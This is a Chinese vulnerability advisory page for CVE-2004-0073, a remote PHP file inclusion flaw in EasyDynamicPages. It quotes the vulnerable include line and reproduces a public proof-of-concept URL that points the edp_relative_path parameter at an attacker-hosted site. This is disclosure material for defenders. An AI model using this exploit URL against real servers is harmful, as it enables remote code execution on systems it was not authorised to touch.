CVE-2004-0073
CVSS7.5
发布时间 :2004-02-17 00:00:00
修订时间 :2016-10-17 22:40:38
NMCOE    

[原文]PHP remote file inclusion vulnerability in (1) config.php and (2) config_page.php for EasyDynamicPages 2.0 allows remote attackers to execute arbitrary PHP code by modifying the edp_relative_path parameter to reference a URL on a remote web server that contains a malicious serverdata.php script.


[CNNVD]EasyDynamicPages config_page.php远程PHP文件包含漏洞(CNNVD-200402-065)

        
        EasyDynamicPages是一款方便构建动态页面的脚本系统。
        EasyDynamicPages配置文件对用户提交的URI参数缺少充分过滤,远程攻击者可以利用这个漏洞包含远程文件,以WEB进程权限在系统上执行任意命令。
        问题存在于'/admin/config.php'文件中:
        ++++++++++++++++++++++++
        include_once $edp_relative_path."admin/serverdata.php";
        ++++++++++++++++++++++++
        由于对$edp_relative_path变量缺少充分过滤,攻击者可以指定包含远程服务器上的恶意PHP文件作为包含文件,以WEB进程权限在系统上执行文件中的任意命令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0073
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0073
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200402-065
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=107307457327707&w=2
(UNKNOWN)  BUGTRAQ  20040102 include() vuln in EasyDynamicPages v.2.0
http://securitytracker.com/id?1008584
(UNKNOWN)  SECTRACK  1008584
http://www.securityfocus.com/bid/9338
(VENDOR_ADVISORY)  BID  9338
http://xforce.iss.net/xforce/xfdb/14136
(UNKNOWN)  XF  easydynamicpages-php-file-include(14136)

- 漏洞信息

EasyDynamicPages config_page.php远程PHP文件包含漏洞
高危 未知
2004-02-17 00:00:00 2006-09-28 00:00:00
远程  
        
        EasyDynamicPages是一款方便构建动态页面的脚本系统。
        EasyDynamicPages配置文件对用户提交的URI参数缺少充分过滤,远程攻击者可以利用这个漏洞包含远程文件,以WEB进程权限在系统上执行任意命令。
        问题存在于'/admin/config.php'文件中:
        ++++++++++++++++++++++++
        include_once $edp_relative_path."admin/serverdata.php";
        ++++++++++++++++++++++++
        由于对$edp_relative_path变量缺少充分过滤,攻击者可以指定包含远程服务器上的恶意PHP文件作为包含文件,以WEB进程权限在系统上执行文件中的任意命令。
        

- 公告与补丁

        厂商补丁:
        Stoitsov
        --------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://software.stoitsov.com/

- 漏洞信息 (23507)

EasyDynamicPages 1.0 config_page.php Remote PHP File Include Vulnerability (EDBID:23507)
php webapps
2004-01-02 Verified
0 tsbeginnervn
N/A [点击下载]
source: http://www.securityfocus.com/bid/9338/info

EasyDynamicPages is prone to a remote file include vulnerability in a configuration script. This will permit a remote attack to include malicious PHP scripts from remote servers, which will then be executed by the web server hosting the vulnerable software. 

http://www.example.com/dynamicpages/fast/config_page.php?do=add_page&du=site&edp_relative_path=http://[attacker's_site]/

The attacker must have a malicious script hosted at the following location:

http://[attacker's_site]/admin/site_settings.php 		

- 漏洞信息

3318
EasyDynamicPages config.php edp_relative_path Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public Uncoordinated Disclosure

- 漏洞描述

EasyDynamicPages contains a flaw that may allow a remote attacker to execute arbitrary commands or code. The issue is due to the 'config.php' script not properly sanitizing user input supplied to the 'edp_relative_path' parameter. This may allow an attacker to include a file from a third-party remote host that contains commands or code that will be executed by the vulnerable script with the same privileges as the web server.

- 时间线

2004-01-02 Unknow
Unknow Unknow

- 解决方案

OSVDB is not aware of a solution for this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站